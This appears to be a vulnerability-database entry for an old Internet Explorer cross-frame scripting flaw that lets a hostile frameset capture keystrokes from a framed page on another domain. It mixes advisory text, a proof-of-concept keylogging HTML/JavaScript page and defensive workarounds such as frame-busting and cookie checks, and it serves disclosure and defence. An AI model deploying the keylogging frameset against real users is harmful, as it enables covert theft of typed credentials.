Published: 2004-12-31 00:00:00
Revised: 2017-07-10 21:31:50

[Original] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to bypass cross-frame scripting restrictions and capture keyboard events from other domains via an HTML document with Javascript that is outside a frameset that includes the target domain, then forcing the frameset to maintain focus. NOTE: the discloser claimed that the vendor does not categorize this as a vulnerability, but it can be used in a spoofing scenario; the discloser provides alternate scenarios. Spoofing scenarios are currently included in CVE.

[CNNVD] Microsoft Internet Explorer Cross-Frame Scripting Restriction Bypass Vulnerability (CNNVD-200412-571)

        Microsoft Internet Explorer is a widely used web browser.
        Microsoft Internet Explorer contains an access validation error. A remote attacker can exploit it to bypass the cross-frame scripting restrictions, so that script in the attacker's page observes events, such as keystrokes, that belong to a framed page from another domain.
        The problem is caused by insufficient restrictions in IE's event handling. According to Microsoft Knowledge Base Article 167796, access between frames in different domains must be restricted; by constructing a frameset definition that contains malicious JavaScript, that frame access restriction can be bypassed.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:5.5:sp2    Microsoft Internet Explorer 5.5 SP2
cpe:/a:microsoft:ie:5.5        Microsoft Internet Explorer 5.5
cpe:/a:microsoft:ie:5.5:sp1    Microsoft Internet Explorer 5.5 SP1
cpe:/a:microsoft:ie:6.0        Microsoft Internet Explorer 6.0

- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN)  IDEFENSE  20040227 Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass
(UNKNOWN)  BID  9761
(UNKNOWN)  XF  ie-frame-domain-bypass(15337)

- Vulnerability information

Microsoft Internet Explorer Cross-Frame Scripting Restriction Bypass Vulnerability
Medium risk    Access validation error
2004-12-31 00:00:00    2005-10-20 00:00:00

- Advisories and patches


- Vulnerability information (23766)

Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability (EDBID:23766)
windows remote
2004-02-27 Verified
0 iDefense
N/A

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script type="text/javascript">
var keylog = '';
document.onkeypress = function () {
  var k = window.event.keyCode;  // IE event model: window.event carries the key code
  window.status = keylog += String.fromCharCode(k) + '[' + k + ']';
};
</script>
</head>
<!-- the frameset re-takes focus whenever it loses it, so keystrokes keep reaching the parent's handler -->
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="" scrolling="auto">  <!-- target-domain page URL (left empty on this page) -->
</frameset>

- Vulnerability information

Microsoft IE Cross Frame Scripting Restriction Bypass
Remote / Network Access Input Manipulation, Other
Loss of Integrity
Exploit Public

- Vulnerability description

Microsoft Internet Explorer contains a flaw that may allow a malicious user to bypass certain frame restrictions (aka Cross Frame Scripting aka XFS). The issue is triggered when access validation errors occur within event handling routines. Malicious JavaScript loaded in a parent frame can then record the keyboard events of child frames.

- Timeline

2004-02-27 Unknown
2004-02-27 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to mitigate the flaw with the following workarounds. Both must be implemented to fully protect sensitive forms from every XFS attack scenario.

Workaround Part 1: Load the following JavaScript at the top of every sensitive form (login, forgot password, registration, etc.). It breaks the page out of any enclosing frame, so a parent document cannot keep the sensitive form inside a child frame:

if (top != self) { top.location = self.location; }

Workaround Part 2: Internet Explorer 6.x has a little-known feature that lets a parent frame load a child frame into the Restricted sites zone by specifying security="restricted" on the frame element. Loading the frame into the restricted zone disables cookies and active scripting for that child frame. Example:

<frame src="" scrolling="auto" security="restricted">

Because of this feature the workaround from Part 1 is disabled: the frame-busting JavaScript never runs, so it cannot break out of the child frame. The parent frame, however, can still run script, so malicious JavaScript in it can still record the child frame's keyboard events. Applications can protect against this in one of two ways.

Either: every sensitive form performs a cookie check to ensure cookies are enabled in the client browser before the form is displayed. If the form has been loaded into a child frame placed in the restricted zone, the check fails because cookies are disabled in that zone; redirect the user to an error message stating that cookies are required to use the application.

Or: write the sensitive form fields with JavaScript. If the child frame is in fact loaded in the restricted zone, the form is never built because active scripting is disabled in that zone. This requires considerably more code for each sensitive form you are trying to protect.

Note: Microsoft has stated that Internet Explorer 7 will not be available to users on Windows 2000 and earlier platforms. Users on those platforms will therefore remain on Internet Explorer 6 and stay vulnerable to these types of attacks.
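The two workarounds above, written out as an added example that is not part of the iDefense advisory or the OSVDB solution text. The frame-busting check, the cookie probe and the script-built form are plain functions over a window-like and a document-like object, so they can be run in Node against constructed stand-ins instead of a real browser; the function names, the stand-in objects and the example URLs are this example's own assumptions.

```javascript
// Added example (not from iDefense or OSVDB): the XFS workarounds as testable
// functions. Stand-in window/document objects are constructed below.

// Workaround Part 1: frame busting. Writing top.location is one of the few
// cross-origin operations browsers allow, so a framed page can always
// navigate the top window to itself.
function breakOutOfFrame(win) {
  if (win.top !== win.self) {
    win.top.location = win.self.location;
    return true; // we were inside someone else's frameset
  }
  return false;
}

// Workaround Part 2a: cookie probe. In IE's restricted zone
// (security="restricted") cookies are disabled, so a write-then-read fails.
function cookiesEnabled(doc) {
  doc.cookie = 'xfsprobe=1';
  return doc.cookie.indexOf('xfsprobe=1') !== -1;
}

// Workaround Part 2b: build the sensitive fields from script. With active
// scripting off in the restricted zone this never runs, so no form appears.
function buildLoginForm(doc, container) {
  const form = doc.createElement('form');
  form.method = 'post';
  for (const name of ['username', 'password']) {
    const input = doc.createElement('input');
    input.name = name;
    input.type = name === 'password' ? 'password' : 'text';
    form.appendChild(input);
  }
  container.appendChild(form);
  return form;
}

// Runs the checks in order and reports the outcome so it can be asserted on.
function protectSensitiveForm(win, doc, container) {
  if (breakOutOfFrame(win)) return 'framed';
  if (!cookiesEnabled(doc)) return 'cookies-required';
  buildLoginForm(doc, container);
  return 'rendered';
}

// Constructed stand-ins for the browser objects (not a real DOM).
function makeFakeDocument(cookiesWork) {
  let jar = '';
  return {
    get cookie() { return jar; },
    set cookie(value) { if (cookiesWork) jar = jar ? jar + '; ' + value : value; },
    createElement(tag) {
      return { tagName: tag, children: [], appendChild(child) { this.children.push(child); } };
    },
  };
}

function makeFakeWindow(framed) {
  const w = { location: 'https://bank.example/login' }; // hypothetical URL
  w.self = w;
  w.top = framed ? { location: 'https://attacker.example/' } : w; // hypothetical URL
  return w;
}

// Walk through the three situations the solution text describes.
function demo() {
  const results = {};

  const framedWin = makeFakeWindow(true);       // hostile frameset around us
  const d1 = makeFakeDocument(true);
  results.framed = protectSensitiveForm(framedWin, d1, d1.createElement('div'));
  results.topAfter = framedWin.top.location;    // top window now points at us

  const d2 = makeFakeDocument(false);           // restricted zone: cookies off
  results.restricted = protectSensitiveForm(makeFakeWindow(false), d2, d2.createElement('div'));

  const d3 = makeFakeDocument(true);            // normal top-level load
  const c3 = d3.createElement('div');
  results.normal = protectSensitiveForm(makeFakeWindow(false), d3, c3);
  results.fields = c3.children[0].children.length;

  return results;
}

console.log(demo());
```

The stand-ins only model the cookie half of the restricted zone; in a real restricted-zone frame the script itself never executes, which is exactly why the script-built form is a defence. On current browsers the server-side equivalent of Part 1 is the X-Frame-Options header or a CSP frame-ancestors directive, neither of which existed when this entry was written; the script above remains a client-side fallback.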

- Related references

- Vulnerability author

Unknown or Incomplete